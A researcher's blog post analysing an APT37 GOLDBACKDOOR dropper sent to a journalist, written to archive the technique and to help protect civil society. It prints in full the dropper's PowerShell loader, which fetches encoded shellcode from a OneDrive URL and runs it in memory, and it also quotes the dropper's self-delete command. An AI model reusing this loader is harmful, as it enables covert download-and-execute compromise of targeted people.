RE:archive | Reverse engineering APT37’s GOLDBACKDOOR dropper
Research REarchive

RE:archive | Reverse engineering APT37’s GOLDBACKDOOR dropper

Please note: The sample covered in this report is from September 2022-January 2023. I have covered this sample for archiving purposes and does not pertain to a known recent threat campaign, though the techniques covered may still apply.


I had this idea to archive the reverse engineering of malware or exploits of historic or prior campaigns by APT groups. Of course, were possible, I want to cover malware and exploits of current samples, but sometimes this is not possible. Either, it's too sensitive to disclose, it wasn't found in my network of people or the sample has not been published. So much of content produced by TI corporations on malware samples is either high-level, abstracted or sometimes does not disclose samples for reverse engineering. Along my travels, I'm often revisiting old samples to understand TTPs or evolutions. Retrohunting, is also retroreverse engineering I say. So with this, I wanted to create a space for this type of content on this website, I call this project the RE:archive. I hope here, I can find a space that will reverse engineer older samples related to APT groups, where they haven't been covered before or simply it is of genuine interest.

Introduction to GOLDBACKDOOR dropper

Journalists have been a predominant target for intelligence operations by threat groups supported by nation state actors. Particularly, threat actors from the Democratic People’s Republic of Korea (DPRK) have adopted consistent and sophisticated efforts to target individuals, such as activists and journalists that speak out against the regime over the last decade.

As an independant researcher, I work with non-profit groups supporting human rights activists, journalists, and anybody at risk from digital threats. And recently in going back through my samples, I found a number of samples I hadn't really discussed indepth before - which sparked the REArchive project. Once such sample was this, a GOLDBACKDOOR dopper campaign, that was seen in January 2023. This is a relatively trivial malware dropper, but it hasn't really been covered much publically. Whilst the time sensitivity of releasing a technical report of this malware has lapsed, I believe that is still valuable to document and archive the reverse engineering of this malware, since I don't believe there has been much detailed technical reporting publically on it (other than Stairwells). My intention here is to cover what this malware does/did as a retrospective analysis; it may support future defence of civil society and journalists.


The sample covered in this report was passed to us from an journalist who had received a message within the Kakaotalk Messaging App. The message discussed the exchange of private and sensitive information related to important figures in the context of North Korean related activities in South Korea.

The sender, asked the journalists to look at the files attached in the message (.zip file). Some of the content within the zip package contained private and sensitive documentation and images relating to individuals pertinent to North Korean/South Korean politics.

Contained with the media content is a file, with the filename title:


File type is a PIF file (Program Information File): PIF-files (Program Information File) are the standard Windows files that are used by the operating system to store information about start-up properties for DOS-applications. PIF-files contain the necessary application's details, such as its name, size, location, creation and modification date, default screen size, memory usage, idle sensitivity, etc. This Windows feature enables users to avoid making multiple adjustments to the DOS-application operating mode each time they are started. It is enough to set up the program once and save the configuration to a PIF-file.

When looking at the entropy of the file, we notice a large rsrc section.

This is due to files contained here, which include a PDF and icons for PDF filetypes.

The sample itself contains many anti-* techniques, however many of these are as a result of the compiler. Because of this, you should note that this is typically standard of VS compilations. I included a review of these for contextual understanding of compilation settings of this malware and to support other reverse engineers in identifying these common attributes in malware.

When debugging the sample, we get anti-debug checks. Of which include Visual Studio Compilers functionality such as __scrt_initalize_crt(1). This is common with VS compilations.

It checks for CPUID and if processor feature PF_XMMI64_INSTRUCTIONS_AVAILABLE is present on the impacted system. If enabled, the malware knows that the SSE2 instruction set is available and more complex mathematical operations are possible.

If it’s not available, it calls IsProcessorFeatureSetPresent(0x17u) to check __fastfail support before a call to IsDebuggerPresent & UnhandledExceptionFilter to check if an exception occurs and no exception handler is registered, checking for a debugger.

Once anit-* checks are made and various compiler checks, winmain is executed.

We first see a call to FindResourceA, where the malware looks for the custom binary resource containing the resources, we noted earlier at 0x67.

Once it finds, loads and locks the resource, we see a handle to the executable and a region allocation.

Following this a call to memmove to copy resource data to new allocated region.

It then makes a call to GetModuleFileNameW, this returns the current location of where the malware is running from in order for it to decrypt a list of strings that will be used to create a filename for the PDF it’s extracting next from the resources.

We then see an additional FindResourceA get a handle to the PDF file contained within rsrc.

Calling GetTempPathW, the malware looks for the users temp directory to write the PDF file to with its generated filename.

This is followed by some appending and a call to wfopen & fwrite to write the PDF to the temp path.

When the malware executes, the file is written to the temp directory. With the file name: ‘개인정보 처리방침 신구대조표_v1.0_220805.pdf’

The dropper then uses the ShellExecuteW function with command “open” to open the file, which opens the PDF file on whatever default app the user has configured to open PDF files with. This process results in the user thinking they simply loaded a PDF file when originally clicking on the executable.

Following the loading of this, an additional GetTempPath is called where a BAT script is written.

The content of the BAT script is then written using fwrite, where a Powershell script is written from a buffer contained in the binary.

This is followed by a ShellExecuteW call with command open of the BAT script.

Opening the full contents of the BAT script, we see the following script is executed:

c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$qwts
i -le $pas2.Length-2;$i=$i+2){$NTMO=$pas2[$i]+$pas2[$i+1];$mdnp= $mdnp+[char
([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock
([Scriptblock]::Create($mdnp));";Invoke-Command -ScriptBlock

Decoded this results in:

[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072); $aa='[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);';
$b=Add-Type -MemberDefinition $aa -Name "AAA" -PassThru; 
$abab = '[DllImport("kernel32.dll")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);'; 
$aab=Add-Type -MemberDefinition $abab -Name "AAB" -PassThru;
$c = New-Object System.Net.WebClient; $d="!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBaFFNUDZlZzhhUkZiN0xVMUNPQ2YzeE5vVFU_ZT1wZ2liaUM/root/content"; 
$bb='[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);'; 
$ccc=Add-Type -MemberDefinition $bb -Name "BBB" -PassThru; $ddd='[DllImport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);'; $fff=Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru; $e=112; 
do { 
try { 
$c.Headers["user-agent"] = "connnecting..."; 
$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100); 
$old = 0;
 $aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);
 for ($h = 1; $h -lt $xmpw4.Length; $h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) ); 
try{throw 1;} 
$handle=$ccc::CreateThread(0,0,$x0,0,0,0); $fff::WaitForSingleObject($handle, 500*1000); 
sleep 11; 
} } while($e -eq 112);

The victim’s machine will then spawn a command line process which subsequently executes the PowerShell script. The script will then download and execute a shellcode payload (XOR encoded using the first byte as a key) stored in Microsoft OneDrive.

Following this execution, the section stage shellcode is executed and the dropper calls vsprintf to execute command line argument “cmd.exe /C ping -n 1 -w 2000 > Nul & Del /f /q \”%s\”” to delete itself.

At the time of writing, the second stage payload C2 was not live, thus we were unable to successfully pull the shellcode for analysis.


During this analysis, I found close parallels and overlaps for this dropper with multiple samples I'd have received from human rights activists and journalists. Notably, the PowerShell script is a common utilization of APT37, where the methodology for its execution may change. This appears to be a common feature of GOLDBACKDOOR’s dropper.

Human rights activist and journalist who may be targeted by campaigns such as this should be extra vigilant when receiving documents or executable by message or mail. Droppers like this, are intended to trick the victim into executing a file that will result in further stages of malware being delivered to the machine.

If you have been a victim or feel targeted by a threat group, you are welcome to reach out to me or organizations such as Interlab. If you are ever worried about targeting, or want to validate anything you think may be a digital threat to you, we welcome you to contact us for support.

IOC and sample


Available on Bazaar or VirusTotal

About this website

I am Ovi, I am an independent researcher. My work is solely related to human & digital rights activism focusing on reverse engineering, data privacy violations & surveillance from hostile government and private organizations that threaten humanity. I work with non-profit groups and directly with those at risk. As an independent researcher, getting my research, work and writings out can be hard, which is why I created this website. You can read more about this here. If you feel that you value this work, please consider subscribing, which will allow me to share my work directly with those who appreciate it without having to work with media organizations.